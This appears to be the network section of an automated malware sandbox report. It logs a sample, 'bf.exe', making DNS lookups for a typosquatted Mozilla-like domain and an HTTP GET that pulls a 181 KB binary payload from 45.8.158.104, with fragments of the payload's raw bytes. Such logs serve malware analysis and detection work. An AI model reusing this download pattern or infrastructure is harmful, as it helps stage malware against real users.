                                      Oct 13, 2022 09:30:54.670661926 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670681953 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.670701027 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670727015 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.670746088 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670780897 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670797110 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.670830965 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712492943 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712548018 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712588072 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712630033 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712670088 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712675095 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712675095 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712676048 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712711096 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712745905 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712747097 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712745905 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712774038 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712790966 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712825060 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712833881 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712846041 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712873936 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712898970 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712914944 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712933064 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712955952 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.712974072 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.712995052 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.713016033 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.713033915 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.713073015 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.713078976 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.713098049 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.713114023 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.713150978 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.713176966 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.713247061 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.753318071 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.753402948 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.753421068 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.753470898 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.753524065 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.753525019 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.753576040 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.754987955 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755048990 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755110979 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755148888 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755157948 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755167961 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755208969 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755217075 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755276918 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755305052 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755332947 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755336046 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755379915 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755425930 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755439997 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755487919 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755498886 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755544901 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755557060 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755599976 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755603075 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755661011 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755718946 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755729914 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755759001 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755778074 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755781889 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755820990 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755875111 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755882025 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755934954 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755940914 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.755985975 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.755999088 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.756043911 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.756057024 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.756093025 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.795928955 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.795990944 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.796015024 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.796055079 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.796094894 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.796104908 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.796118021 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.796155930 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.797621012 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.797678947 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.797683001 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.797734976 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.797777891 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.797801971 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.797801971 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.797849894 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.797866106 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.797924995 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.797982931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798023939 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798023939 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798042059 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798055887 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798091888 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798100948 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798155069 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798202991 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798213005 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798259020 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798274040 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798321009 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798333883 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798378944 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798378944 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798425913 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798439980 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798485041 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798501015 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798543930 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798567057 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798615932 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.798615932 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.798665047 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.838490963 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.838553905 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.838618040 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.838654041 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.838696003 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.838768959 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840308905 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840384960 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840446949 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840466976 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840466976 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840503931 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840518951 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840578079 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840584993 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840646029 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840655088 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840718985 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840719938 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840779066 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840790987 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840851068 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840857029 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840913057 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.840914011 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840966940 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.840981960 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.841036081 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.841049910 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.841106892 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.841116905 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.841169119 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.841171980 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.841223001 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.841236115 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.841295004 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.841304064 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.841362000 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.841367960 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.841418028 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.841427088 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.841475010 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.881469011 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.881541014 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.881583929 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.881630898 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.881767988 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.882855892 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.882966042 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.882992983 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.882992983 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.883024931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.883059978 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.883061886 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.883080006 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.883101940 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.883142948 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.883158922 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.883183956 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.883208036 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.883215904 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.883264065 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.883289099 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:55.414316893 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:55.506730080 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:55.749187946 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:55.749217033 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:55.749335051 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:31:45.808962107 CEST4969680192.168.2.545.8.158.104

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 13, 2022 09:29:33.001714945 CEST5689453192.168.2.58.8.8.8
                                      Oct 13, 2022 09:29:33.023427963 CEST53568948.8.8.8192.168.2.5
                                      Oct 13, 2022 09:31:41.033104897 CEST5029553192.168.2.58.8.8.8
                                      Oct 13, 2022 09:31:41.053165913 CEST53502958.8.8.8192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 13, 2022 09:29:33.001714945 CEST192.168.2.58.8.8.80x26f4Standard query (0)trackingg-protectioon.cdn1.mozilla.netA (IP address)IN (0x0001)false
                                      Oct 13, 2022 09:31:41.033104897 CEST192.168.2.58.8.8.80x84d8Standard query (0)trackingg-protectioon.cdn1.mozilla.netA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 13, 2022 09:29:33.023427963 CEST8.8.8.8192.168.2.50x26f4Name error (3)trackingg-protectioon.cdn1.mozilla.netnonenoneA (IP address)IN (0x0001)false
                                      Oct 13, 2022 09:31:41.053165913 CEST8.8.8.8192.168.2.50x84d8Name error (3)trackingg-protectioon.cdn1.mozilla.netnonenoneA (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • 45.8.158.104

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.54969645.8.158.10480C:\Users\user\Desktop\bf.exe
                                      TimestampkBytes transferredDirectionData
                                      Oct 13, 2022 09:30:53.311197996 CEST1OUTGET /uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                      Host: 45.8.158.104
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 13, 2022 09:30:53.640887022 CEST2INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 13 Oct 2022 07:30:53 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 181392
                                      Connection: keep-alive
                                      Pragma: public
                                      Accept-Ranges: bytes
                                      Expires: 0
                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                      Content-Disposition: inline; filename="6347bead8b091.bin"
                                      Data Raw: f6 c6 24 61 94 d7 44 6c 2a 95 16 24 0e 31 37 b4 45 ee d4 46 ae 3f d9 ee 54 43 36 cc e0 7a 5a 79 41 e3 ee e0 3b 07 6f 42 6d a4 4a d7 3f 01 8e 17 5c ca 06 3b 33 93 4a 50 71 4b 26 9e 8e a0 3f 04 fd 4b 2d 68 6b 55 e5 5d 65 79 e8 6d e3 58 ae a6 2c bf 7c 5e f4 54 38 38 3d 3d 2d 26 84 90 36 6f a9 29 c4 2f 17 18 5f d2 10 37 cd 48 cd 8f 96 32 f0 a4 f8 d8 02 65 2f 14 3f 92 00 1c a4 7d dd 5d 8d 8c ce 0e b5 5c e6 08 fb c2 2b 03 27 97 d3 66 0c be a9 0c 77 7d bd ff cd 35 f6 76 5e 66 c6 e7 3a db 67 14 34 d4 15 9e 8b 4f 0e 69 41 53 3e 9b 80 db a1 32 e1 b5 c5 4a d6 3a de 69 4d 4e 11 f3 a5 81 55 19 68 5e 7d 8e 89 70 2f 06 f1 7e 64 1f c8 d8 41 d2 9b 04 7e 33 a1 40 97 d1 0d bb 50 a0 1c 1c ef 22 ae 23 1b 0b 29 94 61 79 bb 16 72 83 d2 1d 8f 5b 35 4b cf 73 b9 9e 25 f0 cc 2b f7 be 47 ff 2a fb 12 c4 47 27 e1 6b 84 f3 d9 bc b0 a7 0e 08 00 dd 74 be 44 fa 08 d2 0a 0d a7 3d 04 83 6e b3 e9 90 97 a4 6d 5a 3e 2b f6 db 84 2c 36 63 ff ae a9 55 80 68 72 af be 8c fd 07 26 f0 3b 8e e8 28 07 82 44 3e 03 98 bc 97 a2 5a 99 d4 64 ac ff 95 13 5a a4 e0 e9 b6 84 bb 9e 5e 78 20 2c bd 91 0e b8 93 39 bf f5 ba f6 38 bc 9f 2b 07 cd 5f 8f 49 c1 5a dc 27 38 f5 5e 72 e4 1b bc a0 61 d0 9b 52 17 b3 6b 31 d9 60 c7 ec da b3 bb 56 7b 64 7e 8e 1a 16 c9 ce 99 92 33 4c 38 fa 93 de 2f 38 d9 60 68 dc a5 5d 9d ff 80 86 b6 db 31 71 d0 a3 c2 a4 cd 48 78 f9 0d d1 57 fa 07 b7 f3 f3 37 64 27 75 1c 44 74 5a a2 41 c9 7a ba bc b9 81 3c 4f 3f 32 ec 7e b7 1b 5c 10 93 5c 57 08 d7 54 7a 06 69 40 fb 74 89 70 13 56 d1 19 e4 b7 e6 68 9b 9d 15 17 d7 a0 79 86 99 88 e0 63 38 0f a5 51 a3 4b ba ed 7c 49 75 af 77 5d 3e f4 3f 9a 0b ea 4d bc b2 ef a5 f9 33 4c 28 c0 69 5b 74 fc 7f 79 39 9c 94 15 74 7d 1c f2 97 a0 88 62 96 6d 82 6d c8 3a 80 93 24 52 66 69 8d f8 ac 71 9e 3a 37 4d 7f a3 ee fc 1c 39 ad c5 17 1d 11 7f ac 86 df 50 bf b7 ec 5c cf f3 6d 25 80 e2 a0 4d f8 90 6e 7e 15 cd d6 80 62 4d 32 c2 73 42 e3 33 24 b8 bc 97 1d 12 13 25 3c d6 66 d4 3c 32 55 b1 d4 67 f3 4b 4a 5a 4c 26 04 63 2e 43 3e 86 aa b5 2d 13 b2 f7 ad b8 5c 8b 4f 49 d3 65 6c 03 bc 79 70 c8 75 0a 33 35 bc 80 e3 35 bd c2 51 48 d2 e9 62 ef 19 4a 4e e0 bc be 20 f7 6b 85 86 4e 3d d2 ad 3f bb ff c3 4c 0b d7 11 e3 b7 b8 9c d7 d3 91 3e 98 24 92 6a 0a 6f f3 af fe d2 2f 7d 94 5c 32 e6 20 04 69 2e bf e1 2e 34 bc 4f d5 ac a8 da 54 68 b8 78 a8 3f 9e 40 8a aa d6 6a 69 e1 4a 5a 44 fd ca dd 64 c0 48 64 58 25 5a fe e6 9a de e1 04 c8 84 9f bc d4 fe e6 61 c5 ea d2 16 63 af ee 83 94 4a bd fd 04 0d 52 da c2 9c e2 83 34 e0 3a 32 52 73 2b cb 58 8e ca 9e ea 48 57 ef c3 10 16 7d 65 f0 74 f9 91 6f d8 a8 ee 88 e8 42 39 75 a6 a8 71 4c 3a ed ce 7a 45 9c 40 b2 2c 02 eb ea f3 9d f9 bf cd 84 eb 89 a4 15 92 f0 49 1c a5 3e ef 9f 5b d1 78 71 d1 26 bf 30 b6 1b 48 e9 e0 5d af 85 ac 14 2b db 2f fc 75 f5 91 36 16 59 8d 1e 5c f7 c5 f9 0b c1 1e 1f 3b 4c 99 79 40 f4 44 01 a6 46 db 7a 33 4e 4d 6e 27 36 1b ea 8a 28 53 a1 e7 cf b6 45 9c 2f 31
                                      Data Ascii: $aDl*$17EF?TC6zZyA;oBmJ?\;3JPqK&?K-hkU]eymX,|^T88==-&6o)/_7H2e/?}]\+'fw}5v^f:g4OiAS>2J:iMNUh^}p/~dA~3@P"#)ayr[5Ks%+G*G'ktD=nmZ>+,6cUhr&;(D>ZdZ^x ,98+_IZ'8^raRk1`V{d~3L8/8`h]1qHxW7d'uDtZAz<O?2~\\WTzi@tpVhyc8QK|Iuw]>?M3L(i[ty9t}bmm:$Rfiq:7M9P\m%Mn~bM2sB3$%<f<2UgKJZL&c.C>-\OIelypu355QHbJN kN=?L>$jo/}\2 i..4OThx?@jiJZDdHdX%ZacJR4:2Rs+XHW}etoB9uqL:zE@,I>[xq&0H]+/u6Y\;Ly@DFz3NMn'6(SE/1
                                      Oct 13, 2022 09:30:53.640933037 CEST4INData Raw: ef 93 11 0e fb 5d f8 88 5f fa 53 e9 de c1 b4 b5 54 bd 04 93 61 77 b6 0c 1d c8 1e 02 a2 69 f8 a3 aa 1e e3 d1 58 7b 9a 23 0a 5c 60 af 6e f0 92 36 c1 9e 02 60 f1 89 3b 67 a1 a9 79 f0 e0 6c 16 9d 83 e0 4e eb 01 ac d9 88 1f 7c 3d 54 8a f4 16 30 21 20
                                      Data Ascii: ]_STawiX{#\`n6`;gylN|=T0! db}P4aRH{eH4X'KZBP+M|W-Me%<&TkF~|DVImV=:BH|~Vx 1$0YN`x)X<5v:eeG.sx-N;B>xjMMGh3KN9bu
                                      Oct 13, 2022 09:30:53.640959024 CEST5INData Raw: 0a 88 b7 f6 f6 00 fc c7 d5 36 40 a8 c2 6a b2 4d d1 b8 f1 ce fc db 05 d0 8c ed 98 c1 a6 59 1d cd 57 22 40 5c 28 cd b2 88 e0 8f 0c 0a 28 f4 27 3b d0 ae a4 f3 c4 65 5f 6d 5c 20 2b 82 33 c6 a0 ad 71 42 0b 66 ed fd d0 ae b5 4a 20 e3 86 de 7b a4 53 da
                                      Data Ascii: 6@jMYW"@\((';e_m\ +3qBfJ {S:4R%VZa{aj}HH@;#/f()5 [i;'.G}v^Hd6(dQRS60T~D80 /&h
                                      Oct 13, 2022 09:30:53.640983105 CEST6INData Raw: c5 ea 5c 4f d2 42 7d b6 58 3d 9f 06 65 b2 67 f1 7c 1e 9e c4 64 96 35 a2 9c 9f ab 22 b6 35 56 18 10 3f 6a 25 e4 98 4a bb 8a 52 1f 3e 82 28 c3 c6 9a a4 75 ea ea cf 8e 13 f0 56 38 50 75 df 01 a7 9a 0f d4 6b 34 ae 43 98 60 a3 04 87 b1 16 8f 6f e4 e6
                                      Data Ascii: \OB}X=eg|d5"5V?j%JR>(uV8Puk4C`o4On=ghueP8LAI4cZ7zANDzy2eG0ife^SYu?cFN|y-eH\C@/"PdxgvEn< {MCA
                                      Oct 13, 2022 09:30:53.641011000 CEST8INData Raw: a6 aa 5a 25 6c ca 80 ac 74 7d d7 5f 65 69 03 7d 39 65 7b 93 be 3f f1 31 01 ff b3 82 1a e6 33 e0 2f 9d 46 53 b0 83 a0 3e 2e fc 0b ec 28 4e d3 c0 be 34 5c 1c dc 21 38 e2 a8 67 00 38 e6 b6 32 90 15 3e 2f e6 4b 40 b5 66 b3 4a 12 92 2b 4a d3 fa dc 53
                                      Data Ascii: Z%lt}_ei}9e{?13/FS>.(N4\!8g82>/K@fJ+JSd6>(j3G\oQ7o;?)_uX'RO-Er^VHuVqq!w4M@cGfl.h>kBEH9)2iAV,]J$!$Buo
                                      Oct 13, 2022 09:30:53.641037941 CEST9INData Raw: fb d0 d3 7e 0e 58 c5 1f ef c4 eb e5 eb f4 78 ed f3 80 7f e4 52 bf a5 88 25 0f 8d 15 70 7b 7d 5c 6e bf 52 c6 c5 e1 1e 3a ce 31 60 5f 6f 1e 6d c2 d5 23 96 ff 62 8c cb ef 5b ac 43 a4 25 ed fd 17 c2 bd 55 67 d6 a8 36 3c 84 5b e1 95 c1 8a 7e 3f c5 cc
                                      Data Ascii: ~XxR%p{}\nR:1`_om#b[C%Ug6<[~?vF&!~kuUGyjy{tc^+5*]@=]?!WHbO&yu$a<>P0T7?pXYi%sq&0do!(,pW|GB`
                                      Oct 13, 2022 09:30:53.641058922 CEST10INData Raw: d3 a5 f1 18 46 8c 31 2d 76 80 fc 8b f7 b0 98 4f b1 f5 7a d7 12 30 a6 dc 76 9a f2 75 9b a9 7b 7b 15 95 76 3e 3e bb 95 ad f6 a5 75 dc 9c db 95 49 e0 93 cf e4 c8 d3 e3 e7 ea e8 15 67 47 c3 5f 61 02 20 ac 00 1d 63 01 01 5a 85 2d 21 9c b6 ee b7 8a 36
                                      Data Ascii: F1-vOz0vu{{v>>uIgG_a cZ-!6@`5_aDz8o(JTbc72s[G!j:BT?e9I1?9\a54XdHQS]&DPXVR{'sv6H
                                      Oct 13, 2022 09:30:53.641083956 CEST11INData Raw: 2a a8 96 86 cb f1 66 3c 38 14 ab ac cc 84 6a b3 e8 d7 6b 05 11 b8 62 0a a7 1c 61 a3 6f fc aa 80 d4 57 9c 73 05 c3 e2 aa 62 b3 f5 64 40 19 a7 d1 c6 b7 b6 a9 ae 39 4c d0 96 46 b9 72 65 9d 66 ed 0f 28 70 11 85 ca 5a 01 c8 46 cf 18 58 02 0e 9b 01 d8
